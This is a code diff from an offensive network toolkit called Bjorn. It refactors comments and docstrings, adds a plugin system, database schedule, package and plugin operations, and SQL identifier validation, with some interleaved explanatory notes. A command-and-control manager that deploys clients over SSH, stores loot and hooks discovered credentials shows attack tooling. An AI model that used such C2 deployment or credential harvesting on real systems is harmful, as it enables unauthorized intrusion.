        pass  # no-op in Bifrost - we don't auto-reboot

    pwn.name = _name
    pwn.set_name = _set_name

@@ -1,5 +1,5 @@
"""
Bifrost — Epoch tracking.
"""epoch.py - Bifrost epoch tracking and reward signals.

Ported from pwnagotchi/ai/epoch.py + pwnagotchi/ai/reward.py.
"""
import time
@@ -17,7 +17,7 @@ NUM_CHANNELS = 14  # 2.4 GHz channels
# ── Reward function (from pwnagotchi/ai/reward.py) ──────────────

class RewardFunction:
    """Reward signal for RL — higher is better."""
    """Reward signal for RL - higher is better."""

    def __call__(self, epoch_n, state):
        eps = 1e-20
@@ -181,7 +181,7 @@ class BifrostEpoch:
        self.num_slept += inc

    def next(self):
        """Transition to next epoch — compute reward, update streaks, reset counters."""
        """Transition to next epoch - compute reward, update streaks, reset counters."""
        # Update activity streaks
        if not self.any_activity and not self.did_handshakes:
            self.inactive_for += 1

@@ -1,5 +1,5 @@
"""
Bifrost — ASCII face definitions.
"""faces.py - Bifrost ASCII face definitions.

Ported from pwnagotchi/ui/faces.py with full face set.
"""

@@ -1,7 +1,6 @@
"""
Bifrost — Plugin system.
"""plugins.py - Bifrost plugin system.

Ported from pwnagotchi/plugins/__init__.py with ThreadPoolExecutor.
Compatible with existing pwnagotchi plugin files.
"""
import os
import glob
@@ -130,7 +129,7 @@ def load_from_path(path, enabled=()):
    if not path or not os.path.isdir(path):
        return loaded

    logger.debug("loading plugins from %s — enabled: %s", path, enabled)
    logger.debug("loading plugins from %s - enabled: %s", path, enabled)
    for filename in glob.glob(os.path.join(path, "*.py")):
        plugin_name = os.path.basename(filename.replace(".py", ""))
        database[plugin_name] = filename

@@ -1,5 +1,5 @@
"""
Bifrost — Voice / status messages.
"""voice.py - Bifrost voice / status messages.

Ported from pwnagotchi/voice.py, uses random choice for personality.
"""
import random

156
bjorn_plugin.py
Normal file
@@ -0,0 +1,156 @@
"""bjorn_plugin.py - Base class and helpers for Bjorn plugins."""

import logging
from typing import Any, Dict, Optional

from logger import Logger


class PluginLogger:
    """Per-plugin logger that prefixes all messages with the plugin ID.
    Caches Logger instances by name to prevent handler accumulation on reload."""

    _cache: dict = {}  # class-level cache: name -> Logger instance

    def __init__(self, plugin_id: str):
        name = f"plugin.{plugin_id}"
        if name not in PluginLogger._cache:
            PluginLogger._cache[name] = Logger(name=name, level=logging.DEBUG)
        self._logger = PluginLogger._cache[name]

    def info(self, msg: str):
        self._logger.info(msg)

    def warning(self, msg: str):
        self._logger.warning(msg)

    def error(self, msg: str):
        self._logger.error(msg)

    def debug(self, msg: str):
        self._logger.debug(msg)

    def success(self, msg: str):
        self._logger.success(msg)


class BjornPlugin:
    """
    Base class every Bjorn plugin must extend.

    Provides:
    - Access to shared_data, database, and config
    - Convenience wrappers for status/progress/comment
    - Hook methods to override for event-driven behavior
    - Standard action interface (execute) for action-type plugins

    Usage:
        class MyPlugin(BjornPlugin):
            def setup(self):
                self.log.info("Ready!")

            def on_credential_found(self, cred):
                self.log.info(f"New cred: {cred}")
    """

    def __init__(self, shared_data, meta: dict, config: dict):
        """
        Args:
            shared_data: The global SharedData singleton.
            meta: Parsed plugin.json manifest.
            config: User-editable config values (from DB, merged with schema defaults).
        """
        self.shared_data = shared_data
        self.meta = meta
        self.config = config
        self.db = shared_data.db
        self.log = PluginLogger(meta.get("id", "unknown"))
        self.timeout = (meta.get("action") or {}).get("timeout", 300)
        self._plugin_id = meta.get("id", "unknown")

    # ── Convenience wrappers ─────────────────────────────────────────

    def set_progress(self, pct: str):
        """Update the global progress indicator (e.g., '42%')."""
        self.shared_data.bjorn_progress = pct

    def set_status(self, text: str):
        """Update the main status text shown on display and web UI."""
        self.shared_data.bjorn_status_text = text

    def set_comment(self, **params):
        """Update the EPD comment parameters."""
        self.shared_data.comment_params = params

    # ── Lifecycle ────────────────────────────────────────────────────

    def setup(self) -> None:
        """Called once when the plugin is loaded. Override to initialize resources."""
        pass

    def teardown(self) -> None:
        """Called when the plugin is unloaded or Bjorn shuts down. Override to cleanup."""
        pass

    # ── Action interface (type="action" plugins only) ────────────────

    def execute(self, ip: str, port: str, row: dict, status_key: str) -> str:
        """
        Called by the orchestrator for action-type plugins.

        Args:
            ip: Target IP address.
            port: Target port (may be empty string).
            row: Dict with keys: MAC Address, IPs, Ports, Alive.
            status_key: Action class name (for status tracking).

        Returns:
            'success' or 'failed' (string, case-sensitive).
        """
        raise NotImplementedError(
            f"Plugin {self._plugin_id} is type='action' but does not implement execute()"
        )

    # ── Hook methods (override selectively) ──────────────────────────

    def on_host_discovered(self, host: dict) -> None:
        """Hook: called when a new host is found by the scanner.

        Args:
            host: Dict with mac_address, ips, hostnames, vendor, etc.
        """
        pass

    def on_credential_found(self, cred: dict) -> None:
        """Hook: called when new credentials are discovered.

        Args:
            cred: Dict with service, mac, ip, user, password, port.
        """
        pass

    def on_vulnerability_found(self, vuln: dict) -> None:
        """Hook: called when a new vulnerability is found.

        Args:
            vuln: Dict with ip, port, cve_id, severity, description.
        """
        pass

    def on_action_complete(self, action_name: str, success: bool, target: dict) -> None:
        """Hook: called after any action finishes execution.

        Args:
            action_name: The b_class of the action that completed.
            success: True if action returned 'success'.
            target: Dict with mac, ip, port.
        """
        pass

    def on_scan_complete(self, results: dict) -> None:
        """Hook: called after a network scan cycle finishes.

        Args:
            results: Dict with hosts_found, new_hosts, scan_duration, etc.
        """
        pass
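A minimal example plugin against the base class above. The hook payload keys follow the docstrings; manifest loading (plugin.json) and registration are handled by the plugin manager and are omitted here as assumptions:

from bjorn_plugin import BjornPlugin

class CredNotifier(BjornPlugin):
    """Toy hook-type plugin: surface every credential and scan summary."""

    def setup(self):
        self.log.info("CredNotifier ready")

    def on_credential_found(self, cred: dict) -> None:
        # Keys per the base-class docstring: service, mac, ip, user, password, port
        self.log.success(f"{cred.get('service')} cred for "
                         f"{cred.get('user')}@{cred.get('ip')}:{cred.get('port')}")

    def on_scan_complete(self, results: dict) -> None:
        self.set_status(f"scan done: {results.get('hosts_found', 0)} hosts")

    def teardown(self):
        self.log.info("CredNotifier stopped")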
@@ -1,8 +1,6 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
c2_manager.py — Professional Command & Control Server
"""
"""c2_manager.py - Command & Control server for multi-agent coordination over SSH."""

# ==== Stdlib ====
import base64
@@ -28,7 +26,7 @@ import paramiko
from cryptography.fernet import Fernet, InvalidToken

# ==== Project ====
from init_shared import shared_data  # requis (non optionnel)
from init_shared import shared_data  # required
from logger import Logger

# -----------------------------------------------------
@@ -38,19 +36,15 @@ BASE_DIR = Path(__file__).resolve().parent

def _resolve_data_root() -> Path:
    """
    Résout le répertoire racine des données pour le C2, sans crasher
    si shared_data n'a pas encore data_dir prêt.
    Ordre de priorité :
    1) shared_data.data_dir si présent
    2) $BJORN_DATA_DIR si défini
    3) BASE_DIR (fallback local)
    Resolve C2 data root directory without crashing if shared_data isn't ready.
    Priority: shared_data.data_dir > $BJORN_DATA_DIR > BASE_DIR (local fallback)
    """
    sd_dir = getattr(shared_data, "data_dir", None)
    if sd_dir:
        try:
            return Path(sd_dir)
        except Exception:
            pass  # garde un fallback propre
            pass  # clean fallback

    env_dir = os.getenv("BJORN_DATA_DIR")
    if env_dir:
@@ -63,22 +57,20 @@ def _resolve_data_root() -> Path:

DATA_ROOT: Path = _resolve_data_root()

# Sous-dossiers C2
# C2 subdirectories
DATA_DIR: Path = DATA_ROOT / "c2_data"
LOOT_DIR: Path = DATA_DIR / "loot"
CLIENTS_DIR: Path = DATA_DIR / "clients"
LOGS_DIR: Path = DATA_DIR / "logs"

# Timings
HEARTBEAT_INTERVAL: int = 20  # secondes
HEARTBEAT_INTERVAL: int = 20  # seconds
OFFLINE_THRESHOLD: int = HEARTBEAT_INTERVAL * 3  # 60s sans heartbeat

# Création arborescence (idempotente) — OK à l'import, coût faible
# Create directory tree (idempotent) - safe at import time, low cost
for directory in (DATA_DIR, LOOT_DIR, CLIENTS_DIR, LOGS_DIR):
    directory.mkdir(parents=True, exist_ok=True)

# (Optionnel) Prépare un logger si besoin tout de suite
# logger = Logger("c2_manager").get_logger()


@@ -137,7 +129,7 @@ class EventBus:
# ============= Client Templates =============
CLIENT_TEMPLATES = {
    'universal': Template(r"""#!/usr/bin/env python3
# Lab client (Zombieland) — use only in controlled environments
# Lab client (Zombieland) - use only in controlled environments
import socket, json, os, platform, subprocess, threading, time, base64, struct, sys
from pathlib import Path

@@ -924,7 +916,7 @@ class C2Manager:
                        lab_user: str = "testuser", lab_password: str = "testpass") -> dict:
        """Generate new client script"""
        try:
            # Generate Fernet key (base64) and l'enregistrer en DB (rotation si besoin)
            # Generate Fernet key (base64) and store in DB (rotate if existing)
            key_b64 = Fernet.generate_key().decode()
            if self.db.get_active_key(client_id):
                self.db.rotate_key(client_id, key_b64)
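The key handling above relies on Fernet's authenticated encryption. A short round-trip sketch using the same cryptography API, showing why rotating the stored key invalidates old tokens:

from cryptography.fernet import Fernet, InvalidToken

key_b64 = Fernet.generate_key().decode()   # urlsafe base64 string, as stored in the DB
f = Fernet(key_b64.encode())

token = f.encrypt(b'{"heartbeat": 1}')     # authenticated encryption (AES-CBC + HMAC)
print(f.decrypt(token))                    # b'{"heartbeat": 1}'

stale = Fernet(Fernet.generate_key())      # a rotated-away key...
try:
    stale.decrypt(token)                   # ...can no longer read old traffic
except InvalidToken:
    print("rejected: key was rotated")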
@@ -969,7 +961,7 @@ class C2Manager:
                      ssh_pass: str, **kwargs) -> dict:
        """Deploy client via SSH"""
        try:
            # S'assurer qu'une clé active existe (sinon générer le client)
            # Ensure an active key exists (generate client otherwise)
            if not self.db.get_active_key(client_id):
                result = self.generate_client(
                    client_id,
@@ -1028,7 +1020,7 @@ class C2Manager:
        if client_id in self._clients:
            self._disconnect_client(client_id)

        # Révoquer les clés actives en DB
        # Revoke active keys in DB
        try:
            self.db.revoke_keys(client_id)
        except Exception as e:
@@ -1095,7 +1087,7 @@ class C2Manager:

            client_id = client_id_bytes.decode().strip()

            # Récupérer la clé active depuis la DB
            # Retrieve the active key from DB
            active_key = self.db.get_active_key(client_id)
            if not active_key:
                self.logger.warning(f"Unknown client or no active key: {client_id} from {addr[0]}")
@@ -1163,7 +1155,7 @@ class C2Manager:
                    break
                self._process_client_message(client_id, data)
            except OSError as e:
                # socket fermé (remove_client) → on sort sans bruit
                # Socket closed (remove_client) - exit silently
                break
            except Exception as e:
                self.logger.error(f"Client loop error for {client_id}: {e}")
@@ -1248,13 +1240,13 @@ class C2Manager:
            self._handle_loot(client_id, data['download'])

        elif 'result' in data:
            # >>> ici on enregistre avec la vraie commande
            # Store result with the actual command
            self.db.save_command(client_id, last_cmd or '<unknown>', result, True)
            self.bus.emit({"type": "console", "target": client_id, "text": str(result), "kind": "RX"})

        elif 'error' in data:
            error = data['error']
            # >>> idem pour error
            # Same for errors
            self.db.save_command(client_id, last_cmd or '<unknown>', error, False)
            self.bus.emit({"type": "console", "target": client_id, "text": f"ERROR: {error}", "kind": "RX"})

@@ -1308,10 +1300,10 @@ class C2Manager:
        with self._lock:
            client = self._clients.get(client_id)
            if client:
                # signale aux boucles de s'arrêter proprement
                # Signal loops to stop cleanly
                client['info']['closing'] = True

                # fermer proprement le socket
                # Cleanly close the socket
                try:
                    client['sock'].shutdown(socket.SHUT_RDWR)
                except Exception:

98
comment.py
@@ -1,8 +1,4 @@
# comment.py
# Comments manager with database backend
# Provides contextual messages for display with timing control and multilingual support.
# comment = ai.get_comment("SSHBruteforce", params={"user": "pi", "ip": "192.168.0.12"})
# Avec un texte DB du style: "Trying {user}@{ip} over SSH..."
"""comment.py - Contextual display messages with DB-backed templates and i18n support."""

import os
import time
@@ -154,35 +150,42 @@ class CommentAI:
    # --- Bootstrapping DB -----------------------------------------------------

    def _ensure_comments_loaded(self):
        """Ensure comments are present in DB; import JSON if empty."""
        try:
            comment_count = int(self.shared_data.db.count_comments())
        except Exception as e:
            logger.error(f"Database error counting comments: {e}")
            comment_count = 0
        """Import all comments.*.json files on every startup (dedup via UNIQUE index)."""
        import glob as _glob

        if comment_count > 0:
            logger.debug(f"Comments already in database: {comment_count}")
        default_dir = getattr(self.shared_data, "default_comments_dir", "") or ""
        if not default_dir or not os.path.isdir(default_dir):
            logger.debug("No default_comments_dir, seeding minimal fallback set")
            self._seed_minimal_comments()
            return

        # Glob all comments JSON files: comments.en.json, comments.fr.json, etc.
        pattern = os.path.join(default_dir, "comments.*.json")
        json_files = sorted(_glob.glob(pattern))

        # Also check for a bare comments.json
        bare = os.path.join(default_dir, "comments.json")
        if os.path.exists(bare) and bare not in json_files:
            json_files.insert(0, bare)

        imported = 0
        for lang in self._lang_priority():
            for json_path in self._get_comments_json_paths(lang):
                if os.path.exists(json_path):
                    try:
                        count = int(self.shared_data.db.import_comments_from_json(json_path))
                        imported += count
                        if count > 0:
                            logger.info(f"Imported {count} comments (auto-detected lang) from {json_path}")
                        break  # stop at first successful import
                    except Exception as e:
                        logger.error(f"Failed to import comments from {json_path}: {e}")
            if imported > 0:
                break
        for json_path in json_files:
            try:
                count = int(self.shared_data.db.import_comments_from_json(json_path))
                imported += count
                if count > 0:
                    logger.info(f"Imported {count} comments from {json_path}")
            except Exception as e:
                logger.error(f"Failed to import comments from {json_path}: {e}")

        if imported == 0:
            logger.debug("No comments imported, seeding minimal fallback set")
            self._seed_minimal_comments()
        # Nothing new imported - check if DB is empty and seed fallback
        try:
            if int(self.shared_data.db.count_comments()) == 0:
                logger.debug("No comments in DB, seeding minimal fallback set")
                self._seed_minimal_comments()
        except Exception:
            self._seed_minimal_comments()


    def _seed_minimal_comments(self):
@@ -319,6 +322,9 @@ class CommentAI:
        """
        Return a comment if status changed or delay expired.

        When llm_comments_enabled=True in config, tries LLM first;
        falls back to the database/template system on any failure.

        Args:
            status: logical status name (e.g., "IDLE", "SSHBruteforce", "NetworkScanner").
            lang: language override (e.g., "fr"); if None, auto priority is used.
@@ -331,14 +337,36 @@ class CommentAI:
        status = status or "IDLE"

        status_changed = (status != self.last_status)
        if status_changed or (current_time - self.last_comment_time >= self.comment_delay):
        if not status_changed and (current_time - self.last_comment_time < self.comment_delay):
            return None

        # --- Try LLM if enabled ---
        text: Optional[str] = None
        llm_generated = False
        if getattr(self.shared_data, "llm_comments_enabled", False):
            try:
                from llm_bridge import LLMBridge
                text = LLMBridge().generate_comment(status, params)
                if text:
                    llm_generated = True
            except Exception as e:
                logger.debug(f"LLM comment failed, using fallback: {e}")

        # --- Fallback: database / template system (original behaviour) ---
        if not text:
            text = self._pick_text(status, lang, params)
            if text:
                self.last_status = status
                self.last_comment_time = current_time
                self.comment_delay = self._new_delay()
                logger.debug(f"Next comment delay: {self.comment_delay}s")
                return text

        if text:
            self.last_status = status
            self.last_comment_time = current_time
            self.comment_delay = self._new_delay()
            logger.debug(f"Next comment delay: {self.comment_delay}s")
            # Log comments
            if llm_generated:
                logger.info(f"[LLM_COMMENT] ({status}) {text}")
            else:
                logger.info(f"[COMMENT] ({status}) {text}")
            return text
        return None


@@ -1,21 +1,4 @@
"""
data_consolidator.py - Data Consolidation Engine for Deep Learning
═══════════════════════════════════════════════════════════════════════════

Purpose:
    Consolidate logged features into training-ready datasets.
    Prepare data exports for deep learning on external PC.

Features:
    - Aggregate features across time windows
    - Compute statistical features
    - Create feature vectors for neural networks
    - Export in formats ready for TensorFlow/PyTorch
    - Incremental consolidation (low memory footprint)

Author: Bjorn Team
Version: 2.0.0
"""
"""data_consolidator.py - Aggregate logged features into training-ready datasets for export."""

import json
import csv
@@ -195,7 +178,7 @@ class DataConsolidator:
        Computes statistical features and feature vectors.
        """
        try:
            # Parse JSON fields once — reused by _build_feature_vector to avoid double-parsing
            # Parse JSON fields once - reused by _build_feature_vector to avoid double-parsing
            host_features = json.loads(record.get('host_features', '{}'))
            network_features = json.loads(record.get('network_features', '{}'))
            temporal_features = json.loads(record.get('temporal_features', '{}'))
@@ -209,7 +192,7 @@ class DataConsolidator:
                **action_features
            }

            # Build numerical feature vector — pass already-parsed dicts to avoid re-parsing
            # Build numerical feature vector - pass already-parsed dicts to avoid re-parsing
            feature_vector = self._build_feature_vector(
                host_features, network_features, temporal_features, action_features
            )
@@ -484,7 +467,7 @@ class DataConsolidator:
        else:
            raise ValueError(f"Unsupported format: {format}")

        # Free the large records list immediately after export — record_ids is all we still need
        # Free the large records list immediately after export - record_ids is all we still need
        del records

        # AI-01: Write feature manifest with variance-filtered feature names

50
database.py
@@ -1,6 +1,4 @@
|
||||
# database.py
|
||||
# Main database facade - delegates to specialized modules in db_utils/
|
||||
# Maintains backward compatibility with existing code
|
||||
"""database.py - Main database facade, delegates to specialized modules in db_utils/."""
|
||||
|
||||
import os
|
||||
from typing import Any, Dict, Iterable, List, Optional, Tuple
|
||||
@@ -29,6 +27,9 @@ from db_utils.webenum import WebEnumOps
|
||||
from db_utils.sentinel import SentinelOps
|
||||
from db_utils.bifrost import BifrostOps
from db_utils.loki import LokiOps
from db_utils.schedules import ScheduleOps
from db_utils.packages import PackageOps
from db_utils.plugins import PluginOps

logger = Logger(name="database.py", level=logging.DEBUG)

@@ -67,6 +68,9 @@ class BjornDatabase:
self._sentinel = SentinelOps(self._base)
self._bifrost = BifrostOps(self._base)
self._loki = LokiOps(self._base)
self._schedules = ScheduleOps(self._base)
self._packages = PackageOps(self._base)
self._plugins = PluginOps(self._base)

# Ensure schema is created
self.ensure_schema()
@@ -147,6 +151,9 @@ class BjornDatabase:
self._sentinel.create_tables()
self._bifrost.create_tables()
self._loki.create_tables()
self._schedules.create_tables()
self._packages.create_tables()
self._plugins.create_tables()

# Initialize stats singleton
self._stats.ensure_stats_initialized()
@@ -392,6 +399,43 @@ class BjornDatabase:
def delete_script(self, name: str) -> None:
return self._scripts.delete_script(name)

# Schedule operations
def add_schedule(self, *a, **kw): return self._schedules.add_schedule(*a, **kw)
def update_schedule(self, *a, **kw): return self._schedules.update_schedule(*a, **kw)
def delete_schedule(self, *a, **kw): return self._schedules.delete_schedule(*a, **kw)
def list_schedules(self, *a, **kw): return self._schedules.list_schedules(*a, **kw)
def get_schedule(self, *a, **kw): return self._schedules.get_schedule(*a, **kw)
def get_due_schedules(self): return self._schedules.get_due_schedules()
def mark_schedule_run(self, *a, **kw): return self._schedules.mark_schedule_run(*a, **kw)
def toggle_schedule(self, *a, **kw): return self._schedules.toggle_schedule(*a, **kw)

# Trigger operations
def add_trigger(self, *a, **kw): return self._schedules.add_trigger(*a, **kw)
def update_trigger(self, *a, **kw): return self._schedules.update_trigger(*a, **kw)
def delete_trigger(self, *a, **kw): return self._schedules.delete_trigger(*a, **kw)
def list_triggers(self, *a, **kw): return self._schedules.list_triggers(*a, **kw)
def get_trigger(self, *a, **kw): return self._schedules.get_trigger(*a, **kw)
def get_active_triggers(self): return self._schedules.get_active_triggers()
def mark_trigger_fired(self, *a, **kw): return self._schedules.mark_trigger_fired(*a, **kw)
def is_trigger_on_cooldown(self, *a, **kw): return self._schedules.is_trigger_on_cooldown(*a, **kw)

# Package operations
def add_package(self, *a, **kw): return self._packages.add_package(*a, **kw)
def remove_package(self, *a, **kw): return self._packages.remove_package(*a, **kw)
def list_packages(self): return self._packages.list_packages()
def get_package(self, *a, **kw): return self._packages.get_package(*a, **kw)

# Plugin operations
def get_plugin_config(self, *a, **kw): return self._plugins.get_plugin_config(*a, **kw)
def save_plugin_config(self, *a, **kw): return self._plugins.save_plugin_config(*a, **kw)
def upsert_plugin(self, *a, **kw): return self._plugins.upsert_plugin(*a, **kw)
def delete_plugin(self, *a, **kw): return self._plugins.delete_plugin(*a, **kw)
def list_plugins_db(self): return self._plugins.list_plugins()
def set_plugin_enabled(self, *a, **kw): return self._plugins.set_plugin_enabled(*a, **kw)
def set_plugin_hooks(self, *a, **kw): return self._plugins.set_plugin_hooks(*a, **kw)
def get_hooks_for_event(self, *a, **kw): return self._plugins.get_hooks_for_event(*a, **kw)
def get_hooks_for_plugin(self, *a, **kw): return self._plugins.get_hooks_for_plugin(*a, **kw)

# Stats operations
def get_livestats(self) -> Dict[str, int]:
return self._stats.get_livestats()

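The delegation block above is a thin facade: BjornDatabase exposes one flat API while each domain lives in its own Ops class. A hypothetical call path (method names from the diff; the db instance and script name are illustrative):

db = BjornDatabase()
sid = db.add_schedule("net_sweep.py", "recurring", interval_seconds=3600)
# BjornDatabase.add_schedule(*a, **kw)
#   -> self._schedules.add_schedule(...)   # ScheduleOps owns the SQL
db.toggle_schedule(sid, enabled=False)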
@@ -1,5 +1,4 @@
# db_utils/__init__.py
# Database utilities package
"""__init__.py - Database utilities package."""

from .base import DatabaseBase
from .config import ConfigOps
@@ -17,6 +16,8 @@ from .comments import CommentOps
from .agents import AgentOps
from .studio import StudioOps
from .webenum import WebEnumOps
from .schedules import ScheduleOps
from .packages import PackageOps

__all__ = [
'DatabaseBase',
@@ -35,4 +36,6 @@ __all__ = [
'AgentOps',
'StudioOps',
'WebEnumOps',
'ScheduleOps',
'PackageOps',
]

@@ -1,5 +1,4 @@
# db_utils/actions.py
# Action definition and management operations
"""actions.py - Action definition and management operations."""

import json
import sqlite3
@@ -256,7 +255,7 @@ class ActionOps:
out = []
for r in rows:
cls = r["b_class"]
enabled = int(r["b_enabled"]) # 0 reste 0
enabled = int(r["b_enabled"])
out.append({
"name": cls,
"image": f"/actions/actions_icons/{cls}.png",

@@ -1,5 +1,4 @@
# db_utils/agents.py
# C2 (Command & Control) agent management operations
"""agents.py - C2 agent management operations."""

import json
import os

@@ -1,5 +1,4 @@
# db_utils/backups.py
# Backup registry and management operations
"""backups.py - Backup registry and management operations."""

from typing import Any, Dict, List
import logging

@@ -1,6 +1,6 @@
# db_utils/base.py
# Base database connection and transaction management
"""base.py - Base database connection and transaction management."""

import re
import sqlite3
import time
from contextlib import contextmanager
@@ -12,6 +12,16 @@ from logger import Logger

logger = Logger(name="db_utils.base", level=logging.DEBUG)

# Regex for valid SQLite identifiers: alphanumeric + underscore, must start with letter/underscore
_SAFE_IDENT_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*$')


def _validate_identifier(name: str, kind: str = "identifier") -> str:
"""Validate that a SQL identifier (table/column name) is safe against injection."""
if not name or not _SAFE_IDENT_RE.match(name):
raise ValueError(f"Invalid SQL {kind}: {name!r}")
return name
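A quick sketch of how this guard behaves (the example identifiers are illustrative):

_validate_identifier("mac_address")        # returns "mac_address"
_validate_identifier("9lives")             # raises ValueError: must start with a letter or _
_validate_identifier("hosts; DROP TABLE")  # raises ValueError: SQL metacharacters rejected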


class DatabaseBase:
"""
@@ -120,12 +130,15 @@ class DatabaseBase:

def _column_names(self, table: str) -> List[str]:
"""Return a list of column names for a given table (empty if table missing)"""
_validate_identifier(table, "table name")
with self._cursor() as c:
c.execute(f"PRAGMA table_info({table});")
return [r[1] for r in c.fetchall()]

def _ensure_column(self, table: str, column: str, ddl: str) -> None:
"""Add a column with the provided DDL if it does not exist yet"""
_validate_identifier(table, "table name")
_validate_identifier(column, "column name")
cols = self._column_names(table) if self._table_exists(table) else []
if column not in cols:
self.execute(f"ALTER TABLE {table} ADD COLUMN {ddl};")
@@ -134,13 +147,15 @@ class DatabaseBase:
# MAINTENANCE OPERATIONS
# =========================================================================

_VALID_CHECKPOINT_MODES = {"PASSIVE", "FULL", "RESTART", "TRUNCATE"}

def checkpoint(self, mode: str = "TRUNCATE") -> Tuple[int, int, int]:
"""
Force a WAL checkpoint. Returns (busy, log_frames, checkpointed_frames).
mode ∈ {PASSIVE, FULL, RESTART, TRUNCATE}
"""
mode = (mode or "PASSIVE").upper()
if mode not in {"PASSIVE", "FULL", "RESTART", "TRUNCATE"}:
if mode not in self._VALID_CHECKPOINT_MODES:
mode = "PASSIVE"
with self._cursor() as c:
c.execute(f"PRAGMA wal_checkpoint({mode});")

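On the checkpoint modes: TRUNCATE is the most aggressive, flushing the WAL into the main database file and truncating the WAL to zero bytes, which matters on SD-card-backed Pi deployments. A usage sketch per the docstring (the db instance is illustrative; the hunk above is cut off before the return):

busy, log_frames, ckpt_frames = db.checkpoint("TRUNCATE")
if busy:
    # Another connection kept the WAL pinned; a PASSIVE pass avoids blocking it.
    db.checkpoint("PASSIVE")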
@@ -1,6 +1,4 @@
"""
Bifrost DB operations — networks, handshakes, epochs, activity, peers, plugin data.
"""
"""bifrost.py - Networks, handshakes, epochs, activity, peers, plugin data."""
import logging

from logger import Logger
@@ -89,7 +87,7 @@ class BifrostOps:
"ON bifrost_activity(timestamp DESC)"
)

# Peers (mesh networking — Phase 2)
# Peers (mesh networking - Phase 2)
self.base.execute("""
CREATE TABLE IF NOT EXISTS bifrost_peers (
peer_id TEXT PRIMARY KEY,

@@ -1,5 +1,4 @@
# db_utils/comments.py
# Comment and status message operations
"""comments.py - Comment and status message operations."""

import json
import os

@@ -1,5 +1,4 @@
# db_utils/config.py
# Configuration management operations
"""config.py - Configuration management operations."""

import json
import ast

@@ -1,5 +1,4 @@
# db_utils/credentials.py
# Credential storage and management operations
"""credentials.py - Credential storage and management operations."""

import json
import sqlite3

@@ -1,9 +1,9 @@
# db_utils/hosts.py
# Host and network device management operations
"""hosts.py - Host and network device management operations."""

import time
import sqlite3
from typing import Any, Dict, Iterable, List, Optional
from db_utils.base import _validate_identifier
import logging

from logger import Logger
@@ -428,6 +428,7 @@ class HostOps:
if tname == 'hosts':
continue
try:
_validate_identifier(tname, "table name")
cur.execute(f"PRAGMA table_info({tname})")
cols = [r[1].lower() for r in cur.fetchall()]
if 'mac_address' in cols:

@@ -1,6 +1,4 @@
"""
Loki DB operations — HID scripts and job tracking.
"""
"""loki.py - HID script and job tracking operations."""
import logging

from logger import Logger

54
db_utils/packages.py
Normal file
@@ -0,0 +1,54 @@
"""packages.py - Custom package tracking operations."""

import logging
from typing import Any, Dict, List, Optional

from logger import Logger

logger = Logger(name="db_utils.packages", level=logging.DEBUG)


class PackageOps:
"""Custom package management operations"""

def __init__(self, base):
self.base = base

def create_tables(self):
"""Create custom_packages table"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS custom_packages (
name TEXT PRIMARY KEY,
version TEXT,
installed_at TEXT DEFAULT CURRENT_TIMESTAMP,
installed_by TEXT DEFAULT 'user'
);
""")
logger.debug("Packages table created/verified")

# =========================================================================
# PACKAGE OPERATIONS
# =========================================================================

def add_package(self, name: str, version: str) -> None:
"""Insert or replace a package record"""
self.base.execute("""
INSERT OR REPLACE INTO custom_packages (name, version)
VALUES (?, ?);
""", (name, version))

def remove_package(self, name: str) -> None:
"""Delete a package by name"""
self.base.execute("DELETE FROM custom_packages WHERE name=?;", (name,))

def list_packages(self) -> List[Dict[str, Any]]:
"""List all tracked packages"""
return self.base.query(
"SELECT * FROM custom_packages ORDER BY name;"
)

def get_package(self, name: str) -> Optional[Dict[str, Any]]:
"""Get a single package by name"""
return self.base.query_one(
"SELECT * FROM custom_packages WHERE name=?;", (name,)
)

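Because add_package uses INSERT OR REPLACE keyed on name, re-adding a package is an upsert; note that REPLACE re-inserts the row, so installed_at is refreshed too. A small illustrative sequence (version strings are examples):

db.add_package("nmap", "7.94")
db.add_package("nmap", "7.95")              # same name: the row is replaced
print(db.get_package("nmap")["version"])    # -> 7.95
db.remove_package("nmap")
print(db.list_packages())                   # -> []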
137
db_utils/plugins.py
Normal file
@@ -0,0 +1,137 @@
"""plugins.py - Plugin configuration and hook tracking operations."""

import json
import logging
from typing import Any, Dict, List, Optional

from logger import Logger

logger = Logger(name="db_utils.plugins", level=logging.DEBUG)


class PluginOps:
"""Plugin configuration and hook registration operations."""

def __init__(self, base):
self.base = base

def create_tables(self):
"""Create plugin_configs and plugin_hooks tables."""

self.base.execute("""
CREATE TABLE IF NOT EXISTS plugin_configs (
plugin_id TEXT PRIMARY KEY,
enabled INTEGER DEFAULT 1,
config_json TEXT DEFAULT '{}',
meta_json TEXT DEFAULT '{}',
installed_at TEXT DEFAULT CURRENT_TIMESTAMP,
updated_at TEXT DEFAULT CURRENT_TIMESTAMP
);
""")

self.base.execute("""
CREATE TABLE IF NOT EXISTS plugin_hooks (
id INTEGER PRIMARY KEY AUTOINCREMENT,
plugin_id TEXT NOT NULL,
hook_name TEXT NOT NULL,
UNIQUE(plugin_id, hook_name),
FOREIGN KEY (plugin_id) REFERENCES plugin_configs(plugin_id)
ON DELETE CASCADE
);
""")

self.base.execute(
"CREATE INDEX IF NOT EXISTS idx_plugin_hooks_hook "
"ON plugin_hooks(hook_name);"
)

logger.debug("Plugin tables created/verified")

# ── Config CRUD ──────────────────────────────────────────────────

def get_plugin_config(self, plugin_id: str) -> Optional[Dict[str, Any]]:
"""Get plugin config row. Returns dict with parsed config_json and meta."""
row = self.base.query_one(
"SELECT * FROM plugin_configs WHERE plugin_id=?;", (plugin_id,)
)
if row:
try:
row["config"] = json.loads(row.get("config_json") or "{}")
except Exception:
row["config"] = {}
try:
row["meta"] = json.loads(row.get("meta_json") or "{}")
except Exception:
row["meta"] = {}
return row

def save_plugin_config(self, plugin_id: str, config: dict) -> None:
"""Update config_json for a plugin."""
self.base.execute("""
UPDATE plugin_configs
SET config_json = ?, updated_at = CURRENT_TIMESTAMP
WHERE plugin_id = ?;
""", (json.dumps(config, ensure_ascii=False), plugin_id))

def upsert_plugin(self, plugin_id: str, enabled: int, config: dict, meta: dict) -> None:
"""Insert or update a plugin record."""
self.base.execute("""
INSERT INTO plugin_configs (plugin_id, enabled, config_json, meta_json)
VALUES (?, ?, ?, ?)
ON CONFLICT(plugin_id) DO UPDATE SET
enabled = excluded.enabled,
meta_json = excluded.meta_json,
updated_at = CURRENT_TIMESTAMP;
""", (plugin_id, enabled, json.dumps(config, ensure_ascii=False),
json.dumps(meta, ensure_ascii=False)))

def delete_plugin(self, plugin_id: str) -> None:
"""Delete plugin and its hooks (CASCADE)."""
